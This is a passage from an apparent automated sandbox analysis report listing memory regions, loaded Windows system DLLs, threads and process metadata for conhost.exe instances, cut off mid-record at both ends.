0x7ff7fd14d000 end_va = 0x7ff7fd14efff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd14d000" filename = "" Region: id = 6141 start_va = 0x7ff7fd14f000 end_va = 0x7ff7fd14ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd14f000" filename = "" Region: id = 6142 start_va = 0x7ff7fd4c0000 end_va = 0x7ff7fd4d0fff entry_point = 0x7ff7fd4c0000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 6143 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6145 start_va = 0x1dc8090000 end_va = 0x1dc809ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001dc8090000" filename = "" Region: id = 6146 start_va = 0x1dc8160000 end_va = 0x1dc825ffff entry_point = 0x0 region_type = private name = "private_0x0000001dc8160000" filename = "" Region: id = 6147 start_va = 0x1dc8260000 end_va = 0x1dc831dfff entry_point = 0x1dc8260000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6148 start_va = 0x7ff7fd020000 end_va = 0x7ff7fd11ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fd020000" filename = "" Region: id = 6149 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6150 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6151 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6152 start_va = 0x1dc8110000 end_va = 0x1dc814ffff entry_point = 0x0 region_type = private name = "private_0x0000001dc8110000" filename = "" Region: id = 6153 start_va = 0x1dc8320000 end_va = 0x1dc84fffff entry_point = 0x0 region_type = private name = "private_0x0000001dc8320000" filename = "" Region: id = 6154 start_va = 0x7ff7fd14b000 end_va = 0x7ff7fd14cfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd14b000" filename = "" Region: id = 6155 start_va = 0x1dc80a0000 end_va = 0x1dc80a6fff entry_point = 0x0 region_type = private name = "private_0x0000001dc80a0000" filename = "" Region: id = 6156 start_va = 0x7ffaed340000 end_va = 0x7ffaed392fff entry_point = 0x7ffaed340000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 6157 start_va = 0x1dc8150000 end_va = 0x1dc8150fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001dc8150000" filename = "" Region: id = 6158 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6159 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6160 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6161 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6162 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 6163 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6164 start_va = 0x1dc8320000 end_va = 0x1dc8326fff entry_point = 0x0 region_type = private name = "private_0x0000001dc8320000" filename = "" Region: id = 6165 start_va = 0x1dc84f0000 end_va = 0x1dc84fffff entry_point = 0x0 region_type = private name = "private_0x0000001dc84f0000" filename = "" Region: id = 6166 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6167 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 6168 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6169 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 6170 start_va = 0x1dc8330000 end_va = 0x1dc84b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001dc8330000" filename = "" Region: id = 6171 start_va = 0x1dc8500000 end_va = 0x1dc8680fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001dc8500000" filename = "" Region: id = 6172 start_va = 0x1dc8690000 end_va = 0x1dc9a8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001dc8690000" filename = "" Region: id = 6173 start_va = 0x1dc84c0000 end_va = 0x1dc84c0fff entry_point = 0x0 region_type = private name = "private_0x0000001dc84c0000" filename = "" Region: id = 6174 start_va = 0x1dc84d0000 end_va = 0x1dc84d0fff entry_point = 0x0 region_type = private name = "private_0x0000001dc84d0000" filename = "" Region: id = 6175 start_va = 0x1dc9a90000 end_va = 0x1dc9acffff entry_point = 0x0 region_type = private name = "private_0x0000001dc9a90000" filename = "" Region: id = 6258 start_va = 0x1dc9ad0000 end_va = 0x1dc9b0ffff entry_point = 0x0 region_type = private name = "private_0x0000001dc9ad0000" filename = "" Region: id = 6259 start_va = 0x7ff7fd149000 end_va = 0x7ff7fd14afff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd149000" filename = "" Region: id = 6260 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 6261 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 6262 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6263 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 6264 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 6265 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 6266 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 6267 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 6332 start_va = 0x7ffaf2d10000 end_va = 0x7ffaf2da5fff entry_point = 0x7ffaf2d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 6333 start_va = 0x1dc9b10000 end_va = 0x1dc9bbffff entry_point = 0x0 region_type = private name = "private_0x0000001dc9b10000" filename = "" Region: id = 6368 start_va = 0x1dc9bc0000 end_va = 0x1dc9ef6fff entry_point = 0x1dc9bc0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6369 start_va = 0x1dc80d0000 end_va = 0x1dc80f0fff entry_point = 0x1dc80d0000 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 6370 start_va = 0x1dc9b10000 end_va = 0x1dc9b68fff entry_point = 0x1dc9b10000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 6371 start_va = 0x1dc9bb0000 end_va = 0x1dc9bbffff entry_point = 0x0 region_type = private name = "private_0x0000001dc9bb0000" filename = "" Region: id = 6372 start_va = 0x1dc9f00000 end_va = 0x1dca11efff entry_point = 0x0 region_type = private name = "private_0x0000001dc9f00000" filename = "" Region: id = 6373 start_va = 0x1dca120000 end_va = 0x1dca330fff entry_point = 0x0 region_type = private name = "private_0x0000001dca120000" filename = "" Region: id = 6374 start_va = 0x1dca340000 end_va = 0x1dca44dfff entry_point = 0x0 region_type = private name = "private_0x0000001dca340000" filename = "" Region: id = 6375 start_va = 0x1dca450000 end_va = 0x1dca660fff entry_point = 0x0 region_type = private name = "private_0x0000001dca450000" filename = "" Region: id = 6376 start_va = 0x1dca670000 end_va = 0x1dca780fff entry_point = 0x0 region_type = private name = "private_0x0000001dca670000" filename = "" Region: id = 6413 start_va = 0x1dc80d0000 end_va = 0x1dc810ffff entry_point = 0x0 region_type = private name = "private_0x0000001dc80d0000" filename = "" Region: id = 6414 start_va = 0x7ff7fd14d000 end_va = 0x7ff7fd14efff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd14d000" filename = "" Region: id = 6415 start_va = 0x1dc84e0000 end_va = 0x1dc84e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001dc84e0000" filename = "" Region: id = 6416 start_va = 0x1dca790000 end_va = 0x1dca847fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001dca790000" filename = "" Region: id = 6417 start_va = 0x1dc84e0000 end_va = 0x1dc84e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001dc84e0000" filename = "" Region: id = 6418 start_va = 0x7ffaf24b0000 end_va = 0x7ffaf24d1fff entry_point = 0x7ffaf24b0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 6419 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 6420 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 6502 start_va = 0x1dc9a90000 end_va = 0x1dc9a96fff entry_point = 0x0 region_type = private name = "private_0x0000001dc9a90000" filename = "" Region: id = 6503 start_va = 0x1dc9ac0000 end_va = 0x1dc9acffff entry_point = 0x0 region_type = private name = "private_0x0000001dc9ac0000" filename = "" Region: id = 6504 start_va = 0x1dc9aa0000 end_va = 0x1dc9aa4fff entry_point = 0x1dc9aa0000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 6505 start_va = 0x1dc9ab0000 end_va = 0x1dc9ab0fff entry_point = 0x1dc9ab0000 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 6506 start_va = 0x1dc9b10000 end_va = 0x1dc9b11fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001dc9b10000" filename = "" Region: id = 6507 start_va = 0x7ffaecc30000 end_va = 0x7ffaecea3fff entry_point = 0x7ffaecc30000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 6508 start_va = 0x1dc9b20000 end_va = 0x1dc9b20fff entry_point = 0x1dc9b20000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 6509 start_va = 0x1dc9b30000 end_va = 0x1dc9b31fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001dc9b30000" filename = "" Region: id = 6510 start_va = 0x1dc9b20000 end_va = 0x1dc9b20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001dc9b20000" filename = "" Thread: id = 799 os_tid = 0xce8 Thread: id = 806 os_tid = 0xe20 Thread: id = 807 os_tid = 0xe24 Thread: id = 819 os_tid = 0xe84 Process: id = "86" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x220f4000" os_pid = "0xd00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "82" os_parent_pid = "0xeac" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6176 start_va = 0x7f0ee000 end_va = 0x7f0eefff entry_point = 0x0 region_type = private name = "private_0x000000007f0ee000" filename = "" Region: id = 6177 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6178 start_va = 0x1846fc0000 end_va = 0x1846fdffff entry_point = 0x0 region_type = private name = "private_0x0000001846fc0000" filename = "" Region: id = 6179 start_va = 0x1846fe0000 end_va = 0x1846ff3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001846fe0000" filename = "" Region: id = 6180 start_va = 0x1847000000 end_va = 0x184703ffff entry_point = 0x0 region_type = private name = "private_0x0000001847000000" filename = "" Region: id = 6181 start_va = 0x7df5fffc0000 end_va = 0x7ff5fffbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 6182 start_va = 0x7ff7fd200000 end_va = 0x7ff7fd222fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fd200000" filename = "" Region: id = 6183 start_va = 0x7ff7fd22d000 end_va = 0x7ff7fd22efff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd22d000" filename = "" Region: id = 6184 start_va = 0x7ff7fd22f000 end_va = 0x7ff7fd22ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd22f000" filename = "" Region: id = 6185 start_va = 0x7ff7fd4c0000 end_va = 0x7ff7fd4d0fff entry_point = 0x7ff7fd4c0000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 6186 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6187 start_va = 0x1846fc0000 end_va = 0x1846fcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001846fc0000" filename = "" Region: id = 6188 start_va = 0x18470a0000 end_va = 0x184719ffff entry_point = 0x0 region_type = private name = "private_0x00000018470a0000" filename = "" Region: id = 6189 start_va = 0x18471a0000 end_va = 0x184725dfff entry_point = 0x18471a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6190 start_va = 0x7ff7fd100000 end_va = 0x7ff7fd1fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fd100000" filename = "" Region: id = 6191 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6192 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6193 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6194 start_va = 0x1847040000 end_va = 0x184707ffff entry_point = 0x0 region_type = private name = "private_0x0000001847040000" filename = "" Region: id = 6195 start_va = 0x1847260000 end_va = 0x18473bffff entry_point = 0x0 region_type = private name = "private_0x0000001847260000" filename = "" Region: id = 6196 start_va = 0x7ff7fd22b000 end_va = 0x7ff7fd22cfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd22b000" filename = "" Region: id = 6197 start_va = 0x1846fd0000 end_va = 0x1846fd6fff entry_point = 0x0 region_type = private name = "private_0x0000001846fd0000" filename = "" Region: id = 6198 start_va = 0x7ffaed340000 end_va = 0x7ffaed392fff entry_point = 0x7ffaed340000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 6199 start_va = 0x1847080000 end_va = 0x1847080fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001847080000" filename = "" Region: id = 6200 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6201 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6202 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6203 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6204 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 6205 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6206 start_va = 0x1847090000 end_va = 0x1847096fff entry_point = 0x0 region_type = private name = "private_0x0000001847090000" filename = "" Region: id = 6207 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6208 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 6209 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6210 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 6268 start_va = 0x1847260000 end_va = 0x1847260fff entry_point = 0x0 region_type = private name = "private_0x0000001847260000" filename = "" Region: id = 6269 start_va = 0x1847270000 end_va = 0x1847270fff entry_point = 0x0 region_type = private name = "private_0x0000001847270000" filename = "" Region: id = 6270 start_va = 0x18473b0000 end_va = 0x18473bffff entry_point = 0x0 region_type = private name = "private_0x00000018473b0000" filename = "" Region: id = 6271 start_va = 0x18473c0000 end_va = 0x1847547fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000018473c0000" filename = "" Region: id = 6272 start_va = 0x1847550000 end_va = 0x18476d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001847550000" filename = "" Region: id = 6273 start_va = 0x18476e0000 end_va = 0x1848adffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000018476e0000" filename = "" Region: id = 6274 start_va = 0x1847280000 end_va = 0x18472cffff entry_point = 0x0 region_type = private name = "private_0x0000001847280000" filename = "" Region: id = 6334 start_va = 0x1847280000 end_va = 0x18472bffff entry_point = 0x0 region_type = private name = "private_0x0000001847280000" filename = "" Region: id = 6335 start_va = 0x18472c0000 end_va = 0x18472cffff entry_point = 0x0 region_type = private name = "private_0x00000018472c0000" filename = "" Region: id = 6336 start_va = 0x7ff7fd229000 end_va = 0x7ff7fd22afff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd229000" filename = "" Region: id = 6337 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 6338 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 6339 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6340 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 6341 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 6342 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 6343 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 6344 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 6345 start_va = 0x7ffaf2d10000 end_va = 0x7ffaf2da5fff entry_point = 0x7ffaf2d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 6346 start_va = 0x1848ae0000 end_va = 0x1848bcffff entry_point = 0x0 region_type = private name = "private_0x0000001848ae0000" filename = "" Region: id = 6377 start_va = 0x1848bd0000 end_va = 0x1848f06fff entry_point = 0x1848bd0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6378 start_va = 0x1847000000 end_va = 0x1847020fff entry_point = 0x1847000000 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 6379 start_va = 0x18472d0000 end_va = 0x1847328fff entry_point = 0x18472d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 6400 start_va = 0x1848f10000 end_va = 0x184912bfff entry_point = 0x0 region_type = private name = "private_0x0000001848f10000" filename = "" Region: id = 6401 start_va = 0x1849130000 end_va = 0x184934cfff entry_point = 0x0 region_type = private name = "private_0x0000001849130000" filename = "" Region: id = 6402 start_va = 0x1849350000 end_va = 0x184945efff entry_point = 0x0 region_type = private name = "private_0x0000001849350000" filename = "" Region: id = 6403 start_va = 0x1849460000 end_va = 0x1849671fff entry_point = 0x0 region_type = private name = "private_0x0000001849460000" filename = "" Region: id = 6404 start_va = 0x1849680000 end_va = 0x1849795fff entry_point = 0x0 region_type = private name = "private_0x0000001849680000" filename = "" Region: id = 6454 start_va = 0x1847000000 end_va = 0x184703ffff entry_point = 0x0 region_type = private name = "private_0x0000001847000000" filename = "" Region: id = 6455 start_va = 0x18472d0000 end_va = 0x18472d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000018472d0000" filename = "" Region: id = 6456 start_va = 0x7ff7fd22d000 end_va = 0x7ff7fd22efff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd22d000" filename = "" Region: id = 6457 start_va = 0x18472d0000 end_va = 0x1847387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000018472d0000" filename = "" Region: id = 6458 start_va = 0x1847390000 end_va = 0x1847393fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001847390000" filename = "" Region: id = 6459 start_va = 0x7ffaf24b0000 end_va = 0x7ffaf24d1fff entry_point = 0x7ffaf24b0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 6460 start_va = 0x7ffaf2a00000 end_va = 